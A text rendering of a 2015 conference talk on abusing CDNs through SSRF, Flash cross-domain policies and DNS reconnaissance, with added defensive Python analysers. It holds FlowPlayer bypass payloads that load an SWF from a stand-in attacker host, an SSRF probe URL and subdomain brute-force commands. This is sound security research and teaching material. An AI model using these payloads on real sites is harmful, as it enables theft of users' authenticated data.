Bypass Surgery: Abusing Content Delivery Networks With Server Side Request Forgery (SSRF), Flash, and DNS
By Mike Brooks and Matthew Bryant
August 6, 2015
Matthew Bryant (mandatory)
Security Consultant for Bishop Fox
Maintainer of The Hacker Blog: https://thehackerblog.com
@IAmMandatory
HAS BEEN KNOWN TO HACK THINGS
Signal fingerprint:
05 d4 6b db 51 31 9b 43 b6 6b c6 96 91 fb 3c 1e 60 3c 93
6b 4e 1f 55 8e 54 9a 93 e0 a4 c3 ad 99 34
rook
STACKOVERFLOW.COM & SECURITY.STACKEXCHANGE.COM
WORKING BUT TANGLED
Interconnected Services
• Almost all modern web applications depend on third-party services to operate.
• These third parties are implicitly trusted and work invisibly in the background.
ONE PAGE SPAWNING MANY REQUESTS
Content Delivery Networks
• The web consists of many content delivery networks (CDNs) that deliver content via large distributed networks.
• When you visit your favorite sites, you unknowingly trust these services.
ONE PAGE SPAWNING MANY REQUESTS
How People Think the Web Works… (diagram: the browser asks one server for the foxnews.com homepage and gets back "Here you go!")
How It Actually Works… (diagram)
WHAT COULD GO WRONG
Many Sites Trusting a Few CDNs
• Many sites on the Internet trust a short list of CDNs to serve their content.
• What happens when a vulnerability is found in a CDN provider?
• The impact is severe and far reaching.
ATTACK CHAINS
What happened?
• SSRF
• Remote SWF Include
DNS RECONNAISSANCE
DNS HOLDS THE KEYS
INFRASTRUCTURE
A Divided Penetration Testing Scope
Internal / External
TOOLS
Profiling With DNS
DNS meta-query spider
• https://github.com/TheRook/subbrute
Search through a mass reverse-lookup DB
• https://dnsdumpster.com/
Brute-force forward lookups
• https://github.com/darkoperator/dnsrecon
SubBrute 2.0
Source: https://github.com/TheRook/subbrute
• Thorough (~3 hours): authoritative name servers used by default
./subbrute.py google.com -p -s names_large
• Very fast (~8 minutes): using open resolvers
./subbrute.py google.com -p -r resolvers.txt
QUERIES ABOUT QUERIES
DNS Meta Queries
AXFR - Transfers the entire zone file from the master name server to "secondary name servers"
ANY - Returns all records of all types known to the name server. If the name server does not have any information on the name, the request will be forwarded on.
DNS META QUERY
dig any google.com @8.8.8.8
DNS META QUERY SPIDER
./subbrute.py google.com -p -o goog.csv
Types of Records Found on Google.com
Total Records: 3056, Total Subdomains: 358
Record type   Count
A             2379
CNAME         231
AAAA          255
MX            146
NS            12
SRV           22
SOA           3
NOERROR       7
TYPE257       1
DNS RECORD TYPE 257
RFC-6844: DNS Certificate Pinning (Certification Authority Authorization, CAA)
Source: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization
DNS Record Type 257
http://arstechnica.com/security/2015/04/google-chrome-will-banish-chinese-certificate-authority-for-breach-of-trust/
RFC-6698: DNSSEC PKI (DNS-based Authentication of Named Entities, DANE)
Source: https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities
VOIP, CALENDAR, AND LDAP SERVICES
SRV Record Enumeration
• _caldav._tcp.google.com,SRV,5 0 80 calendar.google.com.
• _jabber-client._tcp.google.com,SRV,20 0 5222 alt1.xmpp.l.google.com.
• _ldap._tcp.google.com,SRV,5 0 389 ldap.google.com.
• _xmpp-client._tcp.google.com,SRV,5 0 5222 xmpp.l.google.com.
• _xmpp-server._tcp.google.com,SRV,5 0 5269 xmpp-server.l.google.com.
SOP BYPASS AT SCALE
Akamai EdgeSuite - DNS
static.fbcdn.com → static.facebook.com.edgesuite.net. → a1860.g.akamai.net. → 64.145.75.11
VOIP, CALENDAR, AND LDAP SERVICES
subbrute - Internal Network Assessment
subbrute.exe MicrosoftDomain.com -r internal_resolvers.txt -s names_large.txt
... 19 domain controllers found…
_ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 rangers.LegitBank.com.
_ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 sharks.DOMAIN.com.
_ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 canucks.DOMAIN.com.
A Common DNS Misconfiguration
Source: https://cwe.mitre.org/data/definitions/203.html
NOERROR RESPONSES
./subbrute.py LegitBank.com -p -o comp
_domainkey.LegitBank.com,NOERROR,
sci.LegitBank.com,NOERROR,
vcs.LegitBank.com,NOERROR,
dev.LegitBank.com,NOERROR,
internal.LegitBank.com,NOERROR
INTERNAL ADDRESSES
NOERROR?
cat comp | grep NOERROR > comp.ne
./subbrute.py -t comp.ne -p -o comp.internal
ldap.sci.LegitBank.com,CNAME,prod-ldap-proxy-vip.sci.LegitBank.com.
prod-ldap-proxy-vip.sci.LegitBank.com,CNAME,prod-ldap-proxy-vip-sv4.sci.LegitBank.com.
prod-ldap-proxy-vip-sv4.sci.LegitBank.com,A,10.30.40.40
CONTINUED
NOERROR?
./subbrute.py -t comp.ne -p -o comp.internal
…
accounting.internal.LegitBank.com,A,10.30.0.41
monitoring.internal.LegitBank.com,A,10.30.0.42
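As an added example (not part of the slides or of subbrute itself), the post-processing a defender would run over subbrute's CSV output: pick out the NOERROR parents worth re-enumerating, and flag names that resolve, through their CNAME chains, into private address space. The CSV below is a constructed sample in the shape of the slides' output.

```python
import csv
import ipaddress
from io import StringIO

# Constructed sample in the name,type,value shape of subbrute's CSV output
# (the -o file). Hosts and addresses follow the slides but are illustrative.
SAMPLE_CSV = """\
_domainkey.LegitBank.com,NOERROR,
sci.LegitBank.com,NOERROR,
internal.LegitBank.com,NOERROR
www.LegitBank.com,A,64.145.75.11
ldap.sci.LegitBank.com,CNAME,prod-ldap-proxy-vip.sci.LegitBank.com.
prod-ldap-proxy-vip.sci.LegitBank.com, CNAME,prod-ldap-proxy-vip-sv4.sci.LegitBank.com.
prod-ldap-proxy-vip-sv4.sci.LegitBank.com, A,10.30.40.40
accounting.internal.LegitBank.com, A,10.30.0.41
monitoring.internal.LegitBank.com, A,10.30.0.42
"""


def parse_records(text):
    """Parse name,type,value rows into (name, type, value) tuples.

    Names are lowercased and trailing dots dropped so that CNAME targets
    written as FQDNs ("host.example.com.") match the rows they point at.
    """
    records = []
    for row in csv.reader(StringIO(text)):
        if len(row) < 2 or not row[0].strip():
            continue
        name = row[0].strip().rstrip(".").lower()
        rtype = row[1].strip().upper()
        value = row[2].strip() if len(row) > 2 else ""
        records.append((name, rtype, value))
    return records


def noerror_names(records):
    """Names that answered NOERROR with no data.

    The node exists in the zone even though it has no A record, so it is a
    parent worth brute-forcing again (the -t comp.ne step on the slides).
    """
    return sorted({name for name, rtype, _ in records if rtype == "NOERROR"})


def resolve_addresses(records, name, _depth=0):
    """Follow CNAME chains inside the record set to the final A/AAAA values."""
    if _depth > 8:  # stop on CNAME loops or absurdly long chains
        return []
    name = name.strip().rstrip(".").lower()
    addresses = []
    for rec_name, rtype, value in records:
        if rec_name != name:
            continue
        if rtype in ("A", "AAAA"):
            addresses.append(value)
        elif rtype == "CNAME":
            addresses.extend(resolve_addresses(records, value, _depth + 1))
    return addresses


def private_address_leaks(records):
    """(name, address) pairs where a public zone resolves into private space.

    RFC 1918 / unique-local answers in an Internet-facing zone expose internal
    host names and topology, the misconfiguration the slides file under CWE-203.
    """
    leaks = []
    for name in sorted({rec_name for rec_name, _, _ in records}):
        for address in resolve_addresses(records, name):
            try:
                ip = ipaddress.ip_address(address)
            except ValueError:
                continue  # not an address (CNAME target, empty NOERROR value)
            if ip.is_private:
                leaks.append((name, address))
    return leaks


if __name__ == "__main__":
    recs = parse_records(SAMPLE_CSV)
    print("NOERROR parents to re-brute:", noerror_names(recs))
    for name, address in private_address_leaks(recs):
        print(f"internal address exposed: {name} -> {address}")
```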
SERVER-SIDE REQUEST FORGERY
IT'S A TRUST THING
CROSSING THE ORIGIN BOUNDARY
Server Trust (diagram: LegitBank.com)
FIRST TWO HITS ARE SSRF
Search for “Cross Domain Proxy”
TOOLS
SSRF tools
Netcat for the 21st century
• https://nmap.org/ncat/
HTTP Request and Response Service
• http://httpbin.org/
Burp Collaborator
• http://blog.portswigger.net/2015/04/introducing-burp-collaborator.html
Access to the Web Server's localhost
http://legitbank.com/proxy.php?csurl=http://localhost:631
Access to Internal Network Hardware
CROSSING THE ORIGIN BOUNDARY
Server Trust (diagram: LegitBank.com, www.LegitBank.com, accounting.internal.LegitBank.com)
TOOLS
SSRF In A Load Balancer
PATHS TO EXPLOITATION
SSRF Questions
• Can I access a protected resource?
• Can an XXE DTD system entity be used to make HTTP requests?
• Are internal IP addresses or hosts reachable?
• "Virtual Private Cloud," S3, MongoDB HTTP interface?
• Can I connect to a host I control?
• Can I load arbitrary content such as a SWF on the domain?
FLASH REMOTE SWF INCLUDE VULNERABILITIES
GONE IN A FLASH
MEN HAVE BECOME TOOLS OF THEIR TOOLS
Tools
Crossdomain.xml Proof of Concept Tool
• https://thehackerblog.com/crossdomain/
FlashHTTPRequest
• https://github.com/mandatoryprogrammer/FlashHTTPRequest
JPEXS
• https://www.free-decompiler.com/flash/
SearchDiggity
• http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/
JAVASCRIPT VS FLASH REMOTE INCLUSION
CROSSING THE ORIGIN BOUNDARY
CROSSING THE ORIGIN BOUNDARY
What's an origin?
• An origin is the combination of scheme, domain, and port.
• The Same Origin Policy (SOP) keeps sites in different origins from reading each other's data.
• For example, a script executing in the context of the http://example.com origin cannot read data from http://thirdparty.com because the origins do not match.
CROSSING THE ORIGIN BOUNDARY
Differences between JavaScript and Flash
JavaScript
• Remote JavaScript includes execute in the context of the including site's origin.
Flash
• Remote includes execute in the context of the hosting site's origin.
CROSSING THE ORIGIN BOUNDARY
Remote JavaScript Inclusion Example
http://legitbank.com/
<!DOCTYPE html>
<html>
<head></head>
<body>
<h1>Script Origin:<p id="origin"></p></h1>
<script src="http://thirdparty.com/example.js"></script>
</body>
</html>
CROSSING THE ORIGIN BOUNDARY
Remote JavaScript Inclusion Example
http://thirdparty.com/example.js
document.getElementById('origin').innerText = location.origin
CROSSING THE ORIGIN BOUNDARY
Remote JavaScript Inclusion
CROSSING THE ORIGIN BOUNDARY
Remote Flash Inclusion Example
http://legitbank.com/
<!DOCTYPE html>
<html>
<head></head>
<body>
<object type="application/x-shockwave-flash" data="http://thirdparty.com/example.swf"></object>
</body>
</html>
CROSSING THE ORIGIN BOUNDARY
Remote Flash Inclusion Example
http://thirdparty.com/secrets.txt
Secrets on thirdparty.com!
CROSSING THE ORIGIN BOUNDARY
Flash Cross-Domain Policies
• Before Flash performs a cross-origin request, the target site's crossdomain.xml file is checked.
• This file permits third-party sites to perform authenticated requests via allow-access-from domain tags.
• Wildcard usage is allowed and is commonplace.
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File
http://legitbank.com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain="*.legitbank.com"/>
<allow-access-from domain="*.thirdparty.com"/>
</cross-domain-policy>
Usage of domain wildcards (*.domain.com)?
USES: 75%
DOESN'T USE: 25%
*Taken from a survey of Alexa top 10,000 sites, not including sites with just a wildcard entry
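An added Python evaluator for crossdomain.xml (example code, not the presenters' tool): it lists the grants in a policy, applies Flash's wildcard matching rules to a requesting host, and flags the wildcard grants that the survey counts. The policy text is a constructed sample in the shape of the legitbank.com file above.

```python
import xml.etree.ElementTree as ET

# Constructed policy in the shape of the legitbank.com example on the slides.
SAMPLE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.legitbank.com"/>
  <allow-access-from domain="*.thirdparty.com"/>
  <allow-access-from domain="partner.example" secure="false"/>
</cross-domain-policy>
"""


def allowed_patterns(policy_xml):
    """Return the domain patterns a crossdomain.xml grants access to."""
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")
    return [
        el.get("domain").strip().lower()
        for el in root.findall("allow-access-from")
        if el.get("domain")
    ]


def pattern_matches(pattern, host):
    """Flash matching rules: '*' is everyone, '*.x.y' is x.y plus every
    subdomain of it, anything else is an exact host match."""
    host = host.lower().rstrip(".")
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        base = pattern[2:]
        return host == base or host.endswith("." + base)
    return host == pattern


def is_allowed(policy_xml, requesting_host):
    """Would a SWF served from requesting_host get authenticated access?"""
    return any(pattern_matches(p, requesting_host) for p in allowed_patterns(policy_xml))


def wildcard_findings(policy_xml):
    """Grants that extend trust beyond a single host.

    With a '*.' grant, an arbitrary SWF upload or a vulnerable SWF on any one
    subdomain is enough to read authenticated data from the policy's site,
    which is why the slides enumerate subdomains next.
    """
    findings = []
    for p in allowed_patterns(policy_xml):
        if p == "*":
            findings.append((p, "any site on the Internet"))
        elif p.startswith("*."):
            findings.append((p, "every subdomain of " + p[2:]))
    return findings


if __name__ == "__main__":
    for pattern, scope in wildcard_findings(SAMPLE_POLICY):
        print(f"wildcard grant {pattern}: trusts {scope}")
    print("static.thirdparty.com allowed:", is_allowed(SAMPLE_POLICY, "static.thirdparty.com"))
```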
CROSSING THE ORIGIN BOUNDARY
Enumerating Subdomains With Subbrute
• Enumerate all subdomains of a domain name:
./subbrute.py thirdparty.com
./subbrute.py legitbank.com
• An arbitrary SWF upload or a vulnerable SWF on any of those subdomains compromises the security of legitbank.com.
FLOWPLAYER
DON'T HATE THE PLAYER
DON'T HATE THE PLAYER
FlowPlayer
• FlowPlayer is a Flash application that plays videos and allows the loading of arbitrary Flash plugins.
DON'T HATE THE PLAYER
FlowPlayer
• Problematically, FlowPlayer versions below 3.2.16 allowed the loading of plugins from arbitrary domains.
• This means an attacker can hijack the functionality of FlowPlayer by loading arbitrary plugins into the player.
DON'T HATE THE PLAYER
FlowPlayer
http://legitbank.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: 'http://thirdparty.com/plugin.swf',
}
}
});
DON'T HATE THE PLAYER
Multiple FlowPlayer Bypasses
• With the release of FlowPlayer 3.2.18, new code was introduced to prevent the loading of arbitrary plugins.
• This code parses the plugin URL to check whether it is trusted before loading it.
• However, we found three bypasses by auditing the plugin checking code.
DON’T HATE THE PLAYER
FlowPlayer Bypass #1 – The Check
public static function isLocal(url:String):Boolean {
    trace("localDomain? " + url);
    if (url.indexOf("http://localhost") == 0) return true;
    if (url.indexOf("http://localhost:") == 0) return true;
    if (url.indexOf("file://") == 0) return true;
    if (url.indexOf("http://127.0.0.1") == 0) return true;
    if (url.indexOf("http://") == 0) return false;
    // Intended for path-relative URLs, but a scheme-relative "//host/plugin.swf"
    // also starts with "/" and is accepted as local.
    if (url.indexOf("/") == 0) return true;
    return false;
}
DON'T HATE THE PLAYER
FlowPlayer Bypass #1 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: '//attacker.com/exploit.swf',
}
}
});
DON’T HATE THE PLAYER
FlowPlayer Bypass #2 – The Check
public static function getDomain(url:String):String {
    var schemeEnd:int = getSchemeEnd(url);
    var domain:String = url.substr(schemeEnd);
    var endPos:int = getDomainEnd(domain); // getDomainEnd() is not shown on the slides
    return domain.substr(0, endPos).toLowerCase();
}
internal static function getSchemeEnd(url:String):int {
    // "///" is searched for before "//", so a "///" anywhere later in the URL wins
    // over the real scheme separator and the text after it is taken as the host.
    var pos:int = url.indexOf("///");
    if (pos >= 0) return pos + 3;
    pos = url.indexOf("//");
    if (pos >= 0) return pos + 2;
    return 0;
}
DON'T HATE THE PLAYER
FlowPlayer Bypass #2 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: 'http://attacker.com///legitbank.com/../flowplayer/plugin.swf',
}
}
});
DON'T HATE THE PLAYER
FlowPlayer Bypass #3 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: 'http://legitbank.com/openredirect.php?url=http://attacker.com/flowplayer/plugin.swf',
}
}
});
DON'T HATE THE PLAYER
More bypasses…
There are probably many more, but three is a cool number.
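Added here as an illustration, not FlowPlayer's code: Python ports of the isLocal() and getDomain() checks from the slides (getDomainEnd() is not shown, so it is assumed to stop at the first '/', ':' or '?'), beside a hardened check that resolves the plugin host with a real URL parser against an explicit allowlist, with a note on why bypass #3 needs redirect handling on top of that.

```python
from urllib.parse import urlsplit

# Ports of the two ActionScript checks on the slides, kept faithful so the
# first two bypasses can be reproduced offline, followed by a hardened check.


def is_local_original(url):
    """Port of isLocal(): a series of prefix tests, nothing more."""
    if url.startswith("http://localhost"):
        return True
    if url.startswith("http://localhost:"):
        return True
    if url.startswith("file://"):
        return True
    if url.startswith("http://127.0.0.1"):
        return True
    if url.startswith("http://"):
        return False
    if url.startswith("/"):
        # Meant for path-relative URLs, but a scheme-relative "//host/..."
        # also starts with "/" and is waved through as local (bypass #1).
        return True
    return False


def scheme_end_original(url):
    """Port of getSchemeEnd(): '///' is searched for before '//', so a '///'
    later in the URL wins over the real scheme separator (bypass #2)."""
    pos = url.find("///")
    if pos >= 0:
        return pos + 3
    pos = url.find("//")
    if pos >= 0:
        return pos + 2
    return 0


def get_domain_original(url):
    """Port of getDomain(). getDomainEnd() is not on the slides; assumed here
    to stop at the first '/', ':' or '?' after the scheme."""
    domain = url[scheme_end_original(url):]
    end = len(domain)
    for sep in "/:?":
        idx = domain.find(sep)
        if idx >= 0:
            end = min(end, idx)
    return domain[:end].lower()


def plugin_host_hardened(url, page_host):
    """Host a plugin URL really points at, resolved the way a browser would.

    The authority comes from urlsplit(), not a substring search; only http(s)
    is accepted; scheme-relative URLs resolve to their own authority and
    path-relative URLs to the embedding page's host, never to "local".
    """
    parts = urlsplit(url)
    if parts.scheme not in ("", "http", "https"):
        return None  # file://, javascript: and friends are rejected outright
    if parts.scheme and not parts.netloc:
        return None  # absolute URL with no authority: malformed, reject
    if parts.netloc:  # absolute or scheme-relative ("//host/...")
        return parts.hostname.lower() if parts.hostname else None
    return page_host.lower()  # path-relative: stays on the page's own host


def plugin_allowed(url, page_host, trusted_hosts):
    """Allow a plugin only when its resolved host is on an explicit allowlist.

    This still cannot see through a server-side open redirect on a trusted
    host (bypass #3): the final URL after redirects must be checked too, or
    redirects must not be followed at all when fetching plugins.
    """
    host = plugin_host_hardened(url, page_host)
    return host is not None and host in {h.lower() for h in trusted_hosts}


if __name__ == "__main__":
    for candidate in ("//attacker.com/exploit.swf",
                      "http://attacker.com///legitbank.com/../flowplayer/plugin.swf"):
        print(candidate)
        print("  original isLocal:", is_local_original(candidate),
              " original getDomain:", get_domain_original(candidate))
        print("  hardened host:", plugin_host_hardened(candidate, "legitbank.com"))
```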
(Artist interpretation)
CROSSING THE ORIGIN BOUNDARY
Flowplayer (diagram sequence between attacker.com and legitbank.com: the user logs in to legitbank.com; ATTACKER HIJACKS SWF WITH PLUGIN)
HACKING WEBSITES WITH AKAMAI EDGESUITE
SOP BYPASS AT SCALE
WHAT IS EDGESUITE?
SOP BYPASS AT SCALE
SOP BYPASS AT SCALE
Akamai EdgeSuite
• EdgeSuite.net is used in Akamai's Content Delivery Network (CDN).
• It is part of FreeFlow, Akamai's legacy content delivery service.
• The setup process for FreeFlow involves pointing DNS records at Akamai's network.
• Instead of clients hitting your site directly, the Akamai service acts as a caching and distribution layer in front of it.
SOP BYPASS AT SCALE
Akamai EdgeSuite - DNS
akamai.example.com → x.example.com.edgesuite.net. → a1337.g.akamai.net. → 184.25.56.98
SOP BYPASS AT SCALE
Akamai EdgeSuite (diagram sequence: requests for akamai.example.com are answered by Akamai, which fetches from example.com)
AKAMAI RESOURCE LOCATORS (ARL)
SOP BYPASS AT SCALE
SOP BYPASS AT SCALE
ARLv1
• Akamai Resource Locator
• A special URL form used to host files on the Akamai network.
• A deprecated scheme that Akamai used when setting up clients for its CDN solution.
• Despite being deprecated, many endpoints still have it enabled.
SOP BYPASS AT SCALE
ARLv1
Say you want to host this file on Akamai:
http://example.edgesuite.net/flow/swf/example.swf
SOP BYPASS AT SCALE
ARLv1
http://akamai.example.com/f/248/322142/1d/example.edgesuite.net/flow/swf/example.swf
akamai.example.com: WEBSITE POINTING TO AKAMAI
/f/248/322142/1d/: CACHE OPTIONS (TIME TO CACHE, CLIENT ID, ETC.)
example.edgesuite.net/flow/swf/example.swf: THE URL TO THE FILE
SOP BYPASS AT SCALE
ARLv1
• This process is known as Akamaization of a URL.
• Akamai's network works by pulling the file off your server and hosting it on the CDN.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
• If you point akamai.example.com at Akamai's EdgeSuite service, an outsider can have arbitrary files served from your hostname.
• However, those files can only be retrieved from a specific list of sites.
SOP BYPASS AT SCALE
ARLv1
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
• We took to enumerating what sites could be proxied:
./subbrute.py edgesuite.net
• After some searching we found a site on the whitelist.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
http://mediapm.edgesuite.net/flow/swf/flowplayer-v3.2.16.swf
![Page 93: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/93.jpg)
• Not only does that whitelisted host serve FlowPlayer, it serves FlowPlayer 3.2.16, a version that allows the loading of arbitrary Flash plugins.
• Putting it together: we can now serve a known-vulnerable version of FlowPlayer from any hostname mapped to EdgeSuite, and then hijack it with a plugin of our own.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
![Page 94: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/94.jpg)
http://i.legitbank.com/f/1/1/1/mediapm.edgesuite.net/flow/swf/flowplayer-v3.2.16.swf
![Page 95: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/95.jpg)
(Artist interpretation)
![Page 96: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/96.jpg)
THE FALLOUT
Full Exploit Flow
(Diagram; hosts involved: legitbank.com, attacker.com, akamai.legitbank.com, mediapm.edgesuite.net)
• User logs in to legitbank.com.
• The user then visits attacker.com.
• attacker.com embeds FlowPlayer from akamai.legitbank.com, an EdgeSuite-mapped hostname that proxies the SWF from mediapm.edgesuite.net.
• Attacker loads a malicious plugin into FlowPlayer.
• The hijacked FlowPlayer requests a page from legitbank.com. Due to a *.legitbank.com entry in crossdomain.xml, this is allowed.
![Page 101: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/101.jpg)
REVISITING FLASH CROSS-DOMAIN POLICIES
SOP BYPASS AT SCALE
![Page 102: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/102.jpg)
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File
http://legitbank.com/crossdomain.xml
<cross-domain-policy>
  <allow-access-from domain="*.legitbank.com" />
  <allow-access-from domain="*.thirdparty.com" />
</cross-domain-policy>
![Page 103: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/103.jpg)
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File (same policy, annotated)
IF ANY SUBDOMAIN IS MAPPED TO EDGESUITE THE SITE IS COMPROMISED
![Page 104: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/104.jpg)
• A site doesn’t even have to use Akamai EdgeSuite to be vulnerable.
• It just has to trust an EdgeSuite-mapped hostname via its crossdomain.xml.
• Because Flash crossdomain.xml policies are so commonly over-broad (wildcard subdomains, third-party domains), this increases the impact to many more sites.
SOP BYPASS AT SCALE
Expanding Attack Surface With Flash
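As an added example (not code from the slides or from Adobe), the following Python applies Flash's crossdomain.xml domain-matching rules to the policy above and lists which of a set of hosts would be granted cross-domain access. The sample policy is the slides' example made well-formed; the candidate host list is constructed, with akamai.legitbank.com and media.thirdparty.com standing in for subdomains that happen to be mapped to EdgeSuite.

```python
"""Evaluate a Flash crossdomain.xml policy against hosts an attacker can serve a SWF from.

Added example. The policy is the slides' example made well-formed; the host
list is constructed for illustration.
"""
import xml.etree.ElementTree as ET

SAMPLE_POLICY = """<cross-domain-policy>
  <allow-access-from domain="*.legitbank.com" />
  <allow-access-from domain="*.thirdparty.com" />
</cross-domain-policy>
"""


def allowed_domains(policy_xml: str) -> list:
    """The domain attribute of every allow-access-from element, in order."""
    root = ET.fromstring(policy_xml)
    return [el.get("domain", "") for el in root.iter("allow-access-from")]


def domain_matches(pattern: str, host: str) -> bool:
    """Flash matching rules: '*' matches any host; '*.example.com' matches
    example.com and every host under it; anything else is an exact match."""
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        base = pattern[2:]
        return host == base or host.endswith("." + base)
    return host == pattern


def policy_allows(policy_xml: str, swf_host: str) -> bool:
    """Would a SWF served from swf_host be allowed to read this site's responses?"""
    return any(domain_matches(p, swf_host) for p in allowed_domains(policy_xml))


def exposed_via(policy_xml: str, attacker_reachable_hosts: list) -> list:
    """Hosts (e.g. subdomains mapped to an open CDN proxy) from which an
    attacker-controlled SWF would be granted cross-domain access."""
    return [h for h in attacker_reachable_hosts if policy_allows(policy_xml, h)]


# Constructed: hosts an attacker could serve a SWF from.
CANDIDATE_HOSTS = [
    "akamai.legitbank.com",   # stands in for a subdomain mapped to EdgeSuite
    "media.thirdparty.com",   # same, on the trusted third party
    "attacker.com",
    "notlegitbank.com",       # must not match "*.legitbank.com"
]

if __name__ == "__main__":
    for host in CANDIDATE_HOSTS:
        verdict = "TRUSTED" if policy_allows(SAMPLE_POLICY, host) else "blocked"
        print(f"{host:24} {verdict}")
```

The practical audit is exposed_via: feed it every subdomain of every domain your policy names that resolves to a CDN you do not fully control, and anything it returns is a host from which a hijacked SWF can read your authenticated pages.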
![Page 105: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/105.jpg)
THE FALLOUT
WHO USES A CDN ANYWAYS?
![Page 106: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/106.jpg)
VERIZON WIRELESS
MY OTHER NUMBER IS YOUR NUMBER
![Page 107: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/107.jpg)
NOSCRIPT
A WHITELIST IS MORE A LIST OF POSSIBILITIES
![Page 108: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/108.jpg)
• HTTP Content Security Policy (CSP) will not prevent this type of attack.
• CSP governs the page that embeds the SWF. Since we are loading their SWF into our own page, the target site’s CSP never applies.
• Additionally, we can use vulnerable SWFs hosted on Content Delivery Networks (CDNs) to exploit sites that whitelist those CDNs in their own CSP.
CROSSING THE ORIGIN BOUNDARY
Bypassing HTTP Content Security Policy
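As an added example (not code from the slides), the following Python evaluates the plugin-loading part of a Content Security Policy (object-src, falling back to default-src) for a given SWF host. It shows both points above: a bank page that whitelists its CDN under object-src still lets the CDN-hosted SWF load, and the attacker's own page, which sends no CSP at all, is never restricted by the bank's policy. The headers are constructed for the example.

```python
"""Check whether a page's Content Security Policy lets a plugin (SWF) load from a host.

Added example, not from the slides. The headers below are constructed.
"""


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source, ...]}."""
    directives = {}
    for raw in header.split(";"):
        parts = raw.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    return directives


def plugin_sources(csp: dict) -> list:
    """object-src governs <object>/<embed>; without it default-src applies;
    without either, plugins may load from anywhere."""
    if "object-src" in csp:
        return csp["object-src"]
    return csp.get("default-src", ["*"])


def host_source_matches(source: str, host: str) -> bool:
    """CSP host-source matching on the host part only: '*' matches any host,
    '*.cdn.example' matches hosts under cdn.example but not cdn.example itself."""
    src = source.lower()
    if "://" in src:
        src = src.split("://", 1)[1]
    src = src.split("/", 1)[0].split(":", 1)[0]   # drop path and port
    if src == "*":
        return True
    if src.startswith("*."):
        return host.endswith(src[1:])
    return src == host


def csp_allows_plugin_from(header: str, swf_host: str, page_host: str) -> bool:
    """True if a page on page_host sending this CSP may embed a plugin from swf_host."""
    swf_host = swf_host.lower()
    for source in plugin_sources(parse_csp(header)):
        low = source.lower()
        if low == "'none'":
            return False
        if low == "'self'":
            if swf_host == page_host.lower():
                return True
            continue
        if low.startswith("'"):      # other keyword sources name no host
            continue
        if host_source_matches(low, swf_host):
            return True
    return False


# Constructed headers.
BANK_CSP = "default-src 'self'; object-src 'self' https://mediapm.edgesuite.net; script-src 'self'"
STRICT_CSP = "default-src 'self'; object-src 'none'"
NO_CSP = ""   # the attacker's own page sends no policy at all

if __name__ == "__main__":
    cases = [("legitbank.com", BANK_CSP), ("legitbank.com", STRICT_CSP), ("attacker.com", NO_CSP)]
    for page, header in cases:
        ok = csp_allows_plugin_from(header, "mediapm.edgesuite.net", page)
        print(f"{page:14} {header or '(no CSP)':60.60} -> {'allowed' if ok else 'blocked'}")
```

The fix on the site's side is the STRICT_CSP shape, object-src 'none' (or a list that contains no host you share with other tenants); it protects your own pages, but nothing in your headers reaches the attacker's page, which is why the crossdomain.xml policy has to be fixed as well.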
![Page 109: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/109.jpg)
